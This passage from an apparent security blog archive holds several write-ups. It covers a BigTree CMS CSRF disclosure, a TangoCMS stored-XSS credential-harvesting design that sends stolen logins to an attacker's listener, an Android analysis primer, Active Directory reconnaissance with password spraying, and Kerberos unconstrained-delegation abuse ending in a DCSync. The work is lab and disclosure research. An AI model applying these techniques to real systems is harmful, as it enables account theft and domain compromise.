http://foecms/storecontent/image/test/cmd
Browsing about in this storecontent directory led me to where the actual backdoor had been uploaded:
And now we can run commands on the server:
PWNED!!! :-D
Conclusion
As you can see, there can be a lot of steps involved in attacking a web application, especially if you want to make the most out of the attack.
Yes, I could have used the first SQL injection attack to find the admin account details and crack the password (as in my previous post). But firstly, if the admin account's password is sufficiently secure and properly hashed then it might not be feasible to crack it, and secondly, I wanted to demonstrate another of the many ways a web application could be compromised.
Happy Hacking :-)
Further Reading
I'll advise the exact same further reading as in my previous post because they are all still relevant.
CSRF In BigTree CMS
Yesterday I found a cross site request forgery (CSRF) vulnerability in the latest version of BigTree CMS (at the time of writing version 4.1.5).
This is a little explanation of the vulnerability and how to exploit it.
The Vulnerability
The vulnerability is in the account settings request, which is used to change the account name, company and password.
A normal request looks like this:
The vulnerability exists in [BigTreeROOT]/core/admin/modules/users/profile/update.php:
Here it clearly isn't doing any checks to prevent CSRF.
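For comparison, the usual kind of check that is missing here is a per-session token that a cross-site page can't know. This is a generic Python sketch of that idea, not BigTree's PHP code and not the developer's actual fix; the function names and the dict standing in for the session are assumptions:

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Create a random token, remember it in the session and return it for the form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf_token(session, submitted):
    """Accept the request only if the submitted token matches the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # compare_digest avoids leaking how much of the token matched
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}  # stand-in for the server-side session store
token = issue_csrf_token(session)
print(is_valid_csrf_token(session, token))  # legitimate form submission
print(is_valid_csrf_token(session, None))   # forged cross-site request
```

The update handler would run a check like this before touching the profile, and the profile form would carry the token in a hidden field.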
The Exploit
So exploiting this is very simple, you just have to lure someone who is already logged into the application to visit a page containing this code:
The values here can be changed to anything, it just automatically issues a POST request to http://bigtree/site/index.php/admin/users/profile/update/ with the following arguments:
name=admin&password=newpassword&company=foobar
Unfortunately it is reasonably intrusive because when loaded the victim will see this:
So the user will immediately know that their profile details might have changed.
The Fix
So I contacted Tim Buckingham (the lead developer for BigTree CMS) about this issue yesterday (on 7th March 2015) and he replied the next day informing me that he'd fixed the issue.
You can see the fix here.
The next full releases of BigTree CMS (4.1.6 and 4.0.10) should be out next week and will incorporate this fix.
Happy Hacking :-)
Update (07/04/2015): BigTree CMS have finally released the next version (4.2) that includes the fix, you can download the latest version from here.
Authenticated Stored XSS in TangoCMS
I decided to take a look at TangoCMS for vulnerabilities even though it has been discontinued.
To my surprise there wasn't a huge amount that I could find, I did, however, find an authenticated stored XSS vulnerability.
This post is the description of that vulnerability and how to exploit it.
The Vulnerability
The actual vulnerability exists in the article functionality.
While by default only the admin user is able to create new articles, it makes sense that other users would be given the permissions to create them.
There is some client side filtering going on that does HTML encoding, so if I create an article with the classic javascript alert payload:
What it actually sends is:
The relevant field contains:
If you URL decode this it is more clear:
So it has HTML encoded the less than (<) and greater than (>) signs.
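The 2 layers of encoding are easy to reproduce. This Python sketch only mimics what the browser-side code appears to do (HTML encode, then url encode for the request body); the exact set of characters the real client-side filter encodes is an assumption:

```python
import html
from urllib.parse import quote, unquote

payload = "<script>alert(1)</script>"

encoded_by_client = html.escape(payload)  # what the client-side filter produces
on_the_wire = quote(encoded_by_client)    # how it looks in the request body

print(encoded_by_client)
print(on_the_wire)
print(unquote(on_the_wire) == encoded_by_client)
```

The important point is that both steps happen in the browser, so nothing stops a request from being sent with a value that skipped them.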
Fortunately this is very easy to beat by intercepting the request in burp and inserting our payload then:
Now if we visit the articles page the payload launches:
Exploitation
Even though we've clearly found an XSS vulnerability it is only available to authenticated users who have the ability to create (or edit) articles.
On top of this, the session cookies that are used by the application aren't accessible to script code (they all have the HttpOnly flag set), as you can see when you login:
Because of all of this it isn't immediately obvious why this vulnerability is important at all, and a client could decide to ignore the vulnerability because of this, so I went about creating a decent POC payload that demonstrates the problem with this type of vulnerability.
I decided to create a credential harvesting exploit which hopefully would trick even the more security conscious users (obviously ignoring the ability to use BeEF, I like to show how to do things manually).
The main goal of this exploit is to be as stealthy as possible while stealing the credentials so we only want to attack currently logged in users and also we only want to attack each user once.
The first problem (attacking only logged in users) can be achieved by careful review of the client side source code:
Here you can see a div tag with the id sessionGreating and it contains an a tag whose innerHTML is the actual username (here the username is just user, really imaginative :-).
This obviously only shows to users that are currently logged in.
The fact that we can grab the username out of this helps us with the next part of our exploit.
To attack the user only once we will use localStorage, and by getting the username of the logged in user we can make sure that we still run our main payload for different users that use the same browser.
We can now build the start of our payload:
We could of course redirect any user that isn't logged in to the login screen but that would make it more noisy and I think it would be caught quicker.
At this point we know the user is logged in, we also know the username so we could target specific users if we wish but I will target all logged in users.
We could build the login page manually but it would be boring and hugely unnecessary.
The best way I can think of is by just using the real login page, to do this though we'll first need to log the user out, once logged out we can request the real login page:
Now we have the contents of the login page in l.responseText.
Before we write this to the screen we need to first make a couple of changes.
We need to hook the onsubmit event of the login form, that way we can run a function which steals the username and password before submitting the form.
We also need to tell the user why the login page is being displayed. If we just log the user straight out with no explanation, that might raise more suspicion than if an explanation is given.
For the explanation I think I'll go with the Your session has expired, please login again message, but we want this to look as realistic as possible so we want to display it how normal error messages are displayed on the site.
We can check this by failing a login:
Looking at the source code for this:
We can see that the message is put right after the h1 that has an innerHTML of Login, and right before the form, which is the only form on the page.
We can also see that it's contained within a div tag with the id of eventmsgError and a class of eventmsg, and then inside a p tag.
With all of this information we should be able to create our custom error message using javascript:
Obviously we can't use the normal document element for this but we can transform our responseText into a document object like this:
We need to hook the onsubmit event of the form but first we should replace the innerHTML of the document with our newly created login page:
Now we can hook the onsubmit event:
So after I steal the username and password and send it to my machine, I set the localStorage so that it doesn't run again for that user.
Obviously the URL that the username and password is sent to can be anything.
Lastly I want to implement 1 more thing that will make this attack look even more authentic.
I'm going to use pushState to change the URL that is shown in the address bar as the page is changed to the login page.
This will hopefully fool any user who is perceptive enough to look at the address bar to make sure they are on the login page.
It's worth bearing in mind that this is only possible because the target URL is on the same origin as the URL we are attacking from; it is not possible to do this for different domains:
The state object is irrelevant for our purposes and the second argument to pushState (the title) is actually ignored, but will be sorted by the HTML anyway.
It's worth noting that I tried the exploit as is and it didn't work, here is why it didn't work:
The sessionGreeting div tag that we are using to check if the user is logged in is after the script, and as the script gets run when it is first encountered instead of when the full document is loaded the element doesn't exist yet so it doesn't get past the first if statement.
We can fix this easily using a callback that triggers when the document has finished loading:
So now our full javascript payload can be created:
I URL encoded all of this using Burp:
Copy the output of the Burp encoder, intercept the request while editing the article again and put the encoded payload in between script tags after the article:
At this point I set up a python server listening on another host, and in my payload I had put the IP address of this host with the port 8000.
Then I logged out and logged in as the admin user, when I went to view the article, it showed for a second but then displayed this page:
Obviously if this had happened right after login it might look a little suspicious but the user might have just put it down to an application bug, especially as it wouldn't happen again.
After logging in again on this page I saw this on my terminal running the python server:
Now when viewing the article we see:
Obviously in a real attack we'd upload a less obvious article and probably a very interesting one that a lot of people would want to view.
Conclusion
Obviously the major issue here is the need to already have an account with article add/edit abilities but this could be achieved through phishing, brute forcing or just a malicious user.
But I hope this should demonstrate the need for XSS protection in every area of a web application.
It should also demonstrate a way in which accounts can be hijacked even without the ability to get password hashes and crack them or steal session cookies.
With a little imagination the sky is the limit!
Happy Hacking :-)
Android Basics
Hacking Android is a huge topic, you have the Linux kernel, native code applications and normal Android applications that run on top of the Dalvik VM, a huge attack surface with the wireless, bluetooth, USB, NFC and various other interfaces.
This post is going to be a very short introduction to the platform as well as introducing some very basic analysis techniques for analyzing an Android application.
For this post I will be using a HTC Desire HD running an unrooted Android 2.3.5, this is an old version of Android, running on an old device but it will be fine for the purposes of this post.
The host machine that I'll be using is running 64bit Gentoo running the Linux kernel version 4.0.5.
Setting Up The Environment
The first thing you need to do if you want to analyze an Android device is to install the SDK.
Depending on your system, you might need to install both Android Studio and the platform tools. It's important that you have the platform-tools directory because that is the directory that contains the adb binary.
adb is the Android Debug Bridge and it's used to do any sort of debugging of any android device. Without this application, debugging Android will be very difficult.
On my Windows computer this was installed to C:\Users\User\AppData\Local\Android\sdk\platform-tools.
On my Debian-based system it was installed to $HOME/Android/Sdk/platform-tools and on my Gentoo system it was installed to /usr/bin.
Wherever it is installed, it's best to include this directory in your PATH variable so that you can run it without cd'ing to that directory or having to type the whole file path every time.
This is optional, but on Linux I've been unable to get adb to work without running it as root. Instead of having to use sudo all the time, I set the permissions of the adb binary to 4750 and the ownership to root:wheel. This makes it a setuid binary, so it will run with root permissions but only for users in the wheel group.
The permissions look as follows:
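As a rough illustration of what mode 4750 means, the sketch below uses Python's standard `stat` module to render the mode the way `ls -l` would for a regular file. The helper names are made up for this example; only the mode value comes from the text above.

```python
import stat


def describe_mode(mode: int) -> str:
    """Return the ls-style permission string for a regular file with this mode."""
    return stat.filemode(stat.S_IFREG | mode)


def is_setuid(mode: int) -> bool:
    """True when the setuid bit (the leading 4 in 4750) is set."""
    return bool(mode & stat.S_ISUID)


if __name__ == "__main__":
    # 4750: setuid, owner rwx, group r-x, others nothing
    print(describe_mode(0o4750), is_setuid(0o4750))
```

The `s` in the owner position is the setuid bit, and the empty "others" triplet is what keeps users outside the owning group from running the binary at all.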
Exploring The System Using ADB
Firstly the Android device needs to be connected to the host machine using USB.
After that we need to enable USB debugging, on my test device the setting is in Settings->Applications->Development:
You will need to confirm this:
We can now use adb to get a shell on the Android device and take a look around, first let's check the version of the Linux kernel that it's running:
So as you can see it is, in fact, running Linux version 2.6.35 but in some sort of restricted environment.
Let's check to see some details of the user that we have been logged in as:
As you can see due to the restricted environment, the normal methods aren't working.
But there is an easy way to figure this out:
So that didn't work either, but there is a way to use grep on the output of these commands:
Here we can see we're running as the user shell. Also note that we can run the commands using adb but then pipe the output to applications running on our host system to sort through the data.
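The same idea, running a command on the device and filtering its output on the host, can be sketched in Python. This is only an illustration: `adb_shell` and `grep` are hypothetical helper names, and the `runner` parameter exists purely so the function can be exercised without a device attached.

```python
import subprocess


def adb_shell(command, runner=subprocess.run):
    """Run a command on the device through `adb shell` and return its stdout."""
    result = runner(
        ["adb", "shell", command],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


def grep(text, needle):
    """Host-side filtering: keep only the lines that contain `needle`."""
    # splitlines() also copes with the \r\n endings some adb versions emit
    return [line for line in text.splitlines() if needle in line]
```

With a device connected, something like `grep(adb_shell("ps"), "shell")` would do the filtering on the host rather than relying on tools that may be missing from the device.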
Knowing our username we can now see what shell we are running in:
So this is clearly a Linux system but it's very different from most Linux systems. Let's have a look at the directories under /:
Again, some of these are familiar (like etc, proc, dev...) but directories like system, acct and app-cache are less familiar.
I'm not going to go through the whole of Android; the point of this section was to demonstrate that this is a Linux system, but not one that will seem totally familiar to Linux admins.
There are, however, a couple of commands I want to mention here, firstly getprop:
Here I'm just using getprop to show some information about the build version of Android but you can get a lot of information from this.
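Since getprop prints every property as a `[key]: [value]` line, its full output is easy to turn into a dictionary on the host. The following is a minimal sketch; `parse_getprop` is a name invented for this example.

```python
import re

# Each getprop line looks like: [ro.build.version.release]: [2.3.5]
_PROP_LINE = re.compile(r"^\[([^\]]+)\]: \[(.*)\]$")


def parse_getprop(output):
    """Parse `getprop` output into a dict, skipping lines that do not match."""
    props = {}
    for line in output.splitlines():
        match = _PROP_LINE.match(line.strip())
        if match:
            props[match.group(1)] = match.group(2)
    return props
```

This makes it simple to pull out just the build-related keys, or to diff the properties of two devices.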
The other one is logcat, which is basically the system log:
Here I'm just outputting the last 8 lines of the log. As you can see, logcat is a command built into adb, but you can run it from inside the shell too.
logcat is very useful for debugging as well as for revealing information disclosure vulnerabilities that might exist in an Android application, but we'll get to that a bit later :-)
Installing And Running The Challenge App
For the purposes of this post I created a little, very basic, challenge application, which you can download from here.
You can install the application using adb:
Now that the application is installed we can run it and have a look at what it does.
Starting the application shows us this:
Entering some text into the field and clicking on the Check Password button shows us this:
So it's clear what we have to try and do here.
Android Applications
Android applications come in apk format; these are just Java archive (JAR) files:
These are very similar to zip files and can be unzipped using the unzip utility:
As you will see there are a lot of files in res/; I've shortened the listing here.
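Because an apk is an ordinary zip container, Python's standard `zipfile` module can list its contents as well. This is a small sketch with made-up helper names, not part of the original walkthrough.

```python
import zipfile


def list_apk_entries(apk):
    """Return the entry names inside an apk (a path or a binary file object)."""
    with zipfile.ZipFile(apk) as archive:
        return archive.namelist()


def has_core_files(apk):
    """Check for the two entries discussed in this post."""
    names = set(list_apk_entries(apk))
    return {"AndroidManifest.xml", "classes.dex"} <= names
```

Calling `list_apk_entries` on the path to an apk should give the same names that unzip prints.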
One of the most important files is AndroidManifest.xml. This contains the configuration of the application, including activity, intent and permissions declarations.
But as you can see this is some sort of binary file:
It's actually binary XML.
We can manually convert this to plain XML using something like AXMLPrinter2 but I'll show an easier way to look at this later.
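To recognise the binary XML format programmatically, it helps to know that the file starts with a small little-endian chunk header: a 16-bit chunk type (0x0003 for a compiled XML document), a 16-bit header size and a 32-bit total size. The sketch below only reads that header and does not decode the document; the function names are made up for illustration.

```python
import struct

RES_XML_TYPE = 0x0003  # chunk type used for a compiled XML document


def parse_chunk_header(data):
    """Unpack the 8-byte chunk header: (type, header_size, chunk_size)."""
    return struct.unpack_from("<HHI", data, 0)


def looks_like_binary_xml(data):
    """Heuristic check that `data` begins with a binary XML chunk header."""
    if len(data) < 8:
        return False
    chunk_type, header_size, _chunk_size = parse_chunk_header(data)
    return chunk_type == RES_XML_TYPE and header_size == 8
```

Feeding it the first bytes of an extracted AndroidManifest.xml distinguishes the compiled form from plain-text XML, which would start with `<` instead.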
Another important file is the classes.dex file. This contains all of our Java code.
Most code that runs on Android applications, including most of the Android Framework, is Java, but instead of compiling to Java bytecode, it is compiled into Dalvik bytecode (and stored in .dex or .odex files).
Again, this could be manually decompiled back to Java using dex2jar and looked at using jd-gui but I'll show a better way of doing this too.
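Before reaching for a decompiler, a dex file can be sanity-checked by reading its fixed header. The sketch below reads only a few header fields (magic and version, checksum, file size, header size and endian tag) and assumes the standard 0x70-byte header layout; `parse_dex_header` is a name invented for this example.

```python
import struct

DEX_MAGIC_PREFIX = b"dex\n"
DEX_HEADER_SIZE = 0x70


def parse_dex_header(data):
    """Read a few fields from the start of a classes.dex file."""
    if (len(data) < DEX_HEADER_SIZE
            or data[:4] != DEX_MAGIC_PREFIX
            or data[7:8] != b"\x00"):
        raise ValueError("not a dex file")
    version = data[4:7].decode("ascii")            # e.g. "035"
    (checksum,) = struct.unpack_from("<I", data, 8)
    # offset 12..31 holds the 20-byte SHA-1 signature, skipped here
    file_size, header_size, endian_tag = struct.unpack_from("<III", data, 32)
    return {
        "version": version,
        "checksum": checksum,
        "file_size": file_size,
        "header_size": header_size,
        "endian_tag": endian_tag,
    }
```

A mismatch between `file_size` and the real size on disk is a quick hint that a file is truncated or has been tampered with.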
Doing A Very Basic Static Analysis
To end this post I'll crack this challenge while demonstrating a quick basic analysis of the apk file using a tool called androguard created by Anthony Desnos.
Androguard is a Python toolset for analyzing apk files.
It's very easy to set up. Provided you have Python and git installed, you just run:
This will create a directory in the current directory called androguard.
Now you just need to make sure you have the latest version of IPython installed, you can do that by running:
Now just cd to the androguard directory and you should see the following (or something very similar):
The tool we'll be using is androlyze.py, which we can start by running:
Now we need to import our apk file:
Here we are using the dad decompiler, created by Geoffroy Gueguen, that comes with androguard and selecting the challenge apk file.
Now we can look at this application in more detail:
As you can see this is a very basic application, but we can now see the contents of the AndroidManifest.xml file.
An activity is basically just a screen, or, to relate it to a web application, a page. The main activity is the first activity that is shown to the user.
Let's try to look at some of the code.
First we'll print the different methods which are part of the main activity:
The first place to look here is the onCreate method.
This is the code that gets run when the application first starts:
We can see here that the actual interface for this application is created dynamically using Java.
As you can see from line 20, this main class is registered as the onClickListener for the button that checks the value of the password.
This means that when you press the Check Password button, it will run the onClick method in this class.
So let's look at the code for that method:
So here it's obvious that the password is supersecurepassword.
We can check that on the application itself:
It was fine this time, but there are times when a decompilation will not be enough because the decompiler will not be able to recreate the source code well enough to get the right result.
In these cases you can use the disassembler like this:
Here we can see the actual Dalvik disassembly and decompile it ourselves if need be.
Conclusion
So we've learnt a bit about Android and how we can begin to analyze the system more.
We have been introduced to the basic layout of Android and Android applications, as well as a few tools that can be used to look a little closer at them.
Hopefully this blog post has done a decent job of introducing the basics of Android and given ideas for further exploration.
Further Reading
Android Hacker's Handbook by Joshua J. Drake, Zach Lanier, Collin Mulliner, Pau Oliva Fora, Stephen A. Ridley, Georg Wicherski
Active Directory Reconnaissance - Part 1
So it's been a long time since I've blogged anything but I've finally ported my blog from Octopress and am now in a better position to update it.
For a while now I've been focusing on learning as much as possible about performing infrastructure security assessments, particularly of Active Directory (AD), so it makes sense to start creating some blog posts about that.
AD is a highly complex database used to protect the rest of the infrastructure by providing methods to restrict access to resources and segregate resources from each other. However, partly due to its complexity and partly due to backwards compatibility, it's very common for insecure configurations to be in place on corporate networks. Because of this, and because it is usually used to provide access to huge sections of the infrastructure, it's a high-value target.
In this post, I'll demonstrate some basic reconnaissance that might be possible from a completely unauthenticated position on the infrastructure.
Lab Configuration
The lab configuration is simple, as shown below:
The main thing here is that the IP address of the domain controller is 192.168.73.20.
Basic Scanning
The first step would be to perform a port scan of the target system. Nmap is a common choice for a port scan and for good reason: it has tons of options and is capable of much more than simple port scanning.
A basic port scan using Nmap of the top 1000 TCP ports is shown:
As shown above, a bunch of ports are open on the target domain controller. These can be further probed using the -sV option:
This is known as a service scan and attempts to probe the listening service and return a reliable software name and version.
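To make the basic idea of a port scan concrete, here is a minimal TCP connect check using only Python's `socket` module. It is a plain connect-based check, not how Nmap is implemented, and it does no service or version detection; the function names are invented for this sketch.

```python
import socket


def tcp_port_open(host, port, timeout=1.0):
    """Return True if a full TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable or timed out
        return False


def scan(host, ports, timeout=1.0):
    """Return the subset of `ports` that accepted a connection."""
    return [port for port in ports if tcp_port_open(host, port, timeout)]
```

For example, `scan("192.168.73.20", [53, 88, 389, 445])` would check a handful of ports typically associated with a domain controller, far more slowly and less thoroughly than Nmap does.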
Some Basic Enumeration
LDAP Enumeration
As we can see Lightweight Directory Access Protocol (LDAP) is listening on a number of ports. That is an indication that this system is a domain controller.
The LDAP specification states that the server must provide some information about the RootDSE (https://ldapwiki.com/wiki/RootDSE) even without authentication. This allows us to gather some basic information about the domain:
The ldap-rootdse Nmap script shows us that this domain controller belongs to a child domain (child1.internal.zeroday.lab), shown in the defaultNamingContext attribute, and the root domain is internal.zeroday.lab, shown in the rootDomainNamingContext attribute.
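The naming context attributes hold distinguished names such as `DC=child1,DC=internal,DC=zeroday,DC=lab`, so turning them into DNS domain names is just a matter of joining the DC components. A small sketch, with helper names made up for this example and no handling of escaped commas:

```python
def dn_to_dns_name(dn):
    """Convert a naming-context DN (DC=a,DC=b,...) into a DNS name (a.b...)."""
    labels = []
    for rdn in dn.split(","):
        key, _, value = rdn.strip().partition("=")
        if key.upper() == "DC":
            labels.append(value)
    return ".".join(labels)


def is_child_domain(default_nc, root_nc):
    """True when defaultNamingContext sits below rootDomainNamingContext."""
    child = dn_to_dns_name(default_nc).lower()
    root = dn_to_dns_name(root_nc).lower()
    return child != root and child.endswith("." + root)
```

Comparing the two values this way is how the child/root relationship described above can be spotted automatically.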
DNS Enumeration
Along with LDAP, the port scan showed that this system was listening on UDP port 53, which is almost certainly Domain Name System (DNS). DNS can be queried to determine the domain controllers for a particular domain:
It can also be used to query the root domain's domain controllers:
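Domain controllers are normally located through SRV records registered under the domain name. As a sketch, assuming the standard `_ldap._tcp.dc._msdcs.<domain>` locator record is the one being queried (the original commands are not reproduced here), the record names for both domains can be built like this:

```python
def dc_locator_record(domain):
    """SRV record name that lists the domain controllers of `domain`."""
    return "_ldap._tcp.dc._msdcs." + domain.strip(".").lower()


if __name__ == "__main__":
    for name in ("child1.internal.zeroday.lab", "internal.zeroday.lab"):
        print(dc_locator_record(name))
```

The resulting names can be handed to any DNS client capable of SRV lookups, pointed at the domain controller found during the port scan.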
SMB Enumeration
Server Message Block (SMB) can be really useful for attackers, as there are many possible attacks against the service. Here I'll only perform some very basic enumeration.
First it's useful to know whether NULL authentication is permitted. A Metasploit module can be used to test for this:
So we can access SMB pipes without requiring a username and password. While this isn't that common these days on domain controllers, I have seen this on some corporate networks.
We should also try enumerating users. Another Metasploit module can be used for this:
Password Spraying
Now that we have a list of valid usernames, it's worth trying to guess a valid password. Password spraying is a method of attack where you take a list of valid, or potentially valid, usernames and attempt to try different commonly used passwords across all usernames.
The lab environment is small, but in a real-world AD infrastructure it's very likely that passwords for some accounts can be guessed. Of course, on a real infrastructure extreme care has to be taken before attempting password spraying attacks, as there is a real possibility of locking out user accounts.
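To put some numbers on the lockout risk, the sketch below works out how many guesses per account fit inside one lockout observation window while leaving a safety margin for the users' own typos. The parameter names and the default margin of 2 are assumptions made for this illustration; the real values have to come from the domain's password policy.

```python
import math


def attempts_per_window(lockout_threshold, safety_margin=2):
    """Guesses per account that are safe within one observation window.

    Returns None when the threshold is 0, which means lockout is disabled.
    """
    if lockout_threshold == 0:
        return None
    return max(lockout_threshold - safety_margin, 0)


def windows_needed(password_count, per_window):
    """Number of observation windows needed to try `password_count` passwords."""
    if per_window is None:
        return 1
    if per_window == 0:
        raise ValueError("no safe attempts available under this policy")
    return math.ceil(password_count / per_window)
```

With a threshold of 5 and the default margin, only 3 passwords should be tried per account before waiting out the observation window, so a list of 7 passwords takes 3 windows.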
To perform a password spray CrackMapExec can be used:
The password for the child.user account was discovered in this password spray attempt. Now recon from an authenticated point of view is possible on this domain.
Conclusion
AD security is a huge topic and I've only begun to scratch the surface in this post, even from an unauthenticated point of view. Hopefully this was a half decent way to introduce the topic though.
It's worth noting that there are many tools that perform the same tests carried out in this post, but some of them did not work. I might make a post demonstrating that because it's important to understand that different tools will work in different situations, so it's very useful to have knowledge of many and try others when your first choice fails.
Further Reading
If you are serious about AD security, the best resource out there is adsecurity.org by Sean Metcalf.
Abusing Users Configured with Unconstrained Delegation
An interesting situation came up on a recent assessment which prompted me to do a bit of research in the area, as I'd seen nothing published on this particular issue.
I'd been really interested in the research done on the area of Kerberos Delegation. For this post, I'll be discussing Unconstrained Delegation, which has been covered a great deal in other places, notably here by Sean Metcalf and here by Dirk-jan Mollema, amongst others. If you really want to understand what is going on here, it might be best to read their work and understand it before continuing, although I'll try to give a recap here.
Unconstrained Delegation 101
In a nutshell, unconstrained delegation is when a user or computer has been granted the ability to impersonate users in an Active Directory domain, the only exceptions being users contained within the Protected Users group or marked Sensitive and cannot be delegated.
What happens, in short, after a user has already authenticated and wants to access a service that's been configured for unconstrained delegation (read Sean's post if you want a detailed explanation, that's where this section is plagiarised from):
- The user presents its TGT to the DC when requesting a service ticket.
- The DC opens the TGT & validates PAC checksum – If the DC can open the ticket & the checksum checks out, the TGT is valid. The data in the TGT is effectively copied to create the service ticket. The DC places a copy of the user’s TGT into the service ticket.
- The service ticket is encrypted using the target service account’s NTLM password hash and sent to the user (TGS-REP).
- The user connects to the server hosting the service on the appropriate port & presents the service ticket (AP-REQ). The service opens the service ticket using its NTLM password hash.
The diagram below (also taken from Sean's post) shows the full process:
The Situation
While abusing unconstrained delegation has been covered in detail many times, all of these posts address machine accounts. I've not yet seen anything related to abusing users configured for unconstrained delegation.
The setup for the demo is simple. A domain internal.zeroday.lab, with a domain controller IDC1 and a user TestUCSPN which has been configured for unconstrained delegation, as can be seen below:
As shown, the TrustedForDelegation attribute is set to True and the ServicePrincipalName is set to cifs/notexist.internal.zeroday.lab. The cifs service is being used here purely for convenience in demonstrating the issue.
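Under the hood, TrustedForDelegation corresponds to a bit in the account's userAccountControl value. The sketch below decodes a handful of the documented flag bits; the table is deliberately incomplete and the function names are made up for this example.

```python
# A small subset of the documented userAccountControl flag bits
UAC_FLAGS = {
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "TRUSTED_FOR_DELEGATION": 0x80000,      # unconstrained delegation
    "NOT_DELEGATED": 0x100000,              # "sensitive and cannot be delegated"
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
}


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def has_unconstrained_delegation(value):
    """True when the TRUSTED_FOR_DELEGATION bit is set."""
    return bool(value & UAC_FLAGS["TRUSTED_FOR_DELEGATION"])
```

A normal user account trusted for unconstrained delegation would carry both the NORMAL_ACCOUNT and TRUSTED_FOR_DELEGATION bits, which is what makes such users easy to find with a bitwise LDAP filter.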
The DNS record for notexist.internal.zeroday.lab does not exist:
This is all that is required to exploit it because the password for the machine account is not needed, but in this example the machine account also doesn't exist:
This allows me to demonstrate that it is still exploitable, by creating the machine account, using Kevin Robertson's Powermad:
Abuse
While it doesn't matter if the machine account is created in Active Directory, the DNS record needs to not exist for this attack to work (or it needs to point to a machine under your control).
If the DNS record doesn't exist, like in this example, it's easy to create one using any valid domain user account. Here I'm using Dirk-jan Mollema's krbrelayx:
Here 192.168.71.198 is the IP address of a Linux system under my control.
Sometimes it takes a little while for the name to resolve so it's good to check before continuing:
Now everything is in place to abuse this configuration. First, we need the hash of the service account's password (TestUCSPN in this case). For this Benjamin Delpy's tool mimikatz does the job nicely:
To retrieve the target's TGT ticket, we'll again use Dirk-jan Mollema's krbrelayx:
And from the same repository the printerbug.py script to trigger the authentication from the domain controller (192.168.71.20) to the target SPN host (notexist.internal.zeroday.lab):
This coerces the domain controller to authenticate to the CIFS service on host notexist.internal.zeroday.lab where the krbrelayx.py script is listening. The krbrelayx.py script saves the ticket in ccache format:
This saved the ticket in the current working directory with the name [email protected][email protected].
For some reason, converting it to kirbi format using krbrelayx.py was failing with the error below:
Of course, you could use the ccache format with impacket but I decided to use Will Schroeder's Rubeus so I needed the ticket in kirbi format.
To convert the ticket I used Zer1t0's ticket_converter and then base64 encoded it:
This is now usable by Rubeus.
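The base64 step itself needs nothing special. As a sketch, once a ticket is already in kirbi format, it can be turned into a single-line base64 string with the standard library; the function names and the file path argument are placeholders for this example.

```python
import base64


def to_base64_line(raw):
    """Encode raw ticket bytes as one base64 line with no wrapping."""
    return base64.b64encode(raw).decode("ascii")


def kirbi_file_to_base64(path):
    """Read a .kirbi file from disk and return its base64 form."""
    with open(path, "rb") as handle:
        return to_base64_line(handle.read())
```

Unlike the `base64` command line tool, `b64encode` does not insert line breaks, so the result can be pasted straight into a command line argument.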
First, to demonstrate that a DCSync is not possible from the current context, mimikatz was used:
Lastly, Rubeus is used to inject the ticket into the current context and then mimikatz is able to perform a DCSync of the KRBTGT account from the domain controller:
Conclusion
One of the interesting things I find about attacks like this is here I used the TGT for the domain controller IDC1 to perform a DCSync from the same domain controller IDC1. I'm not sure why this is possible as I can see no reason why a domain controller would need to synchronize with itself, but it works...
This post is, as far as I've seen, the first explanation of how to take advantage of unconstrained delegation without needing to compromise any machines. While it's most likely an uncommon situation, I have seen this in the wild recently.
Kerberos delegation is a really interesting point of research and I'm sure there will be plenty more research coming out in the future so it's well worth getting up to date with the current research out there.
Delegate 2 Thyself
This post is also available in PDF format here.
So a situation arose on the BloodHound Slack channel recently which is very similar to the one I'm going to describe in this post and the user could have benefited from this so I've decided to speed up my writing of this particular post. It's going to involve using resource-based constrained delegation (RBCD) for local privilege escalation.
Firstly, there are much better resources for a full explanation of the RBCD theory and attack vectors. The best I've read is Wagging the Dog by Elad Shamir, but there are also this and this by Will Schroeder, and even the Microsoft Kerberos documentation if you really want to understand how Kerberos works as a whole.
I learned everything I know about RBCD from the posts mentioned above, so I highly recommend reading and understanding those if you truly want to understand RBCD.
Here I'll simply be explaining an attack that, while very similar to some being spoken about, I've not really seen anywhere, while trying to clear up a few areas of confusion a lot of people seem to have on the topic.
Resource-Based Constrained Delegation 101
While those other posts are without doubt the place to go if you want to understand how this works, I'll try to give a little recap of the essentials here.
Delegation is used in Kerberos to allow services to impersonate users to other services. This is so that, for example, if a user accesses a web server and that web server is using a database server in the background, the web server is able to impersonate the user to access the database server and only gain access to the data owned by that user.
Resource-Based Constrained Delegation is governed by an Access Control List (ACL) contained within the msDS-AllowedToActOnBehalfOfOtherIdentity Active Directory attribute of the target machine account. This means if you want AccountA to be able to delegate to AccountB, then you have to set an Access Control Entry (ACE) within the ACL in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on AccountB for AccountA.
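In practice the ACL is usually written as an SDDL string and then converted into a binary security descriptor before being stored in the attribute. The sketch below only builds the SDDL text for one delegating account. The access-mask string is the one commonly seen in public RBCD write-ups and is an assumption here, not necessarily what is used later in this post; the conversion to binary is not shown.

```python
import re

_SID_PATTERN = re.compile(r"^S-1-\d+(-\d+)+$")

# Rights string commonly used in public RBCD examples (an assumption here)
_FULL_RIGHTS = "CCDCLCSWRPWPDTLOCRSDRCWDWO"


def rbcd_sddl(delegating_sid):
    """Build an SDDL string with one allow ACE for the account in `delegating_sid`."""
    if not _SID_PATTERN.match(delegating_sid):
        raise ValueError("not a valid SID string: %r" % delegating_sid)
    return "O:BAD:(A;;%s;;;%s)" % (_FULL_RIGHTS, delegating_sid)
```

In the AccountA/AccountB terms used above, the SID passed in is AccountA's, and the resulting descriptor is what would be set on AccountB.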
Confusion 1 - Service Accounts
As Elad mentions in his post, SYSTEM, NT AUTHORITY\NETWORK SERVICE and Microsoft Virtual Accounts all authenticate on the network as the machine account on domain-joined systems. This is really useful to know as most Windows services on modern versions of Windows will run using a Microsoft Virtual Account by default. The 2 most notable are IIS and MSSQL but I'm sure there are many more.
This can be verified very easily:
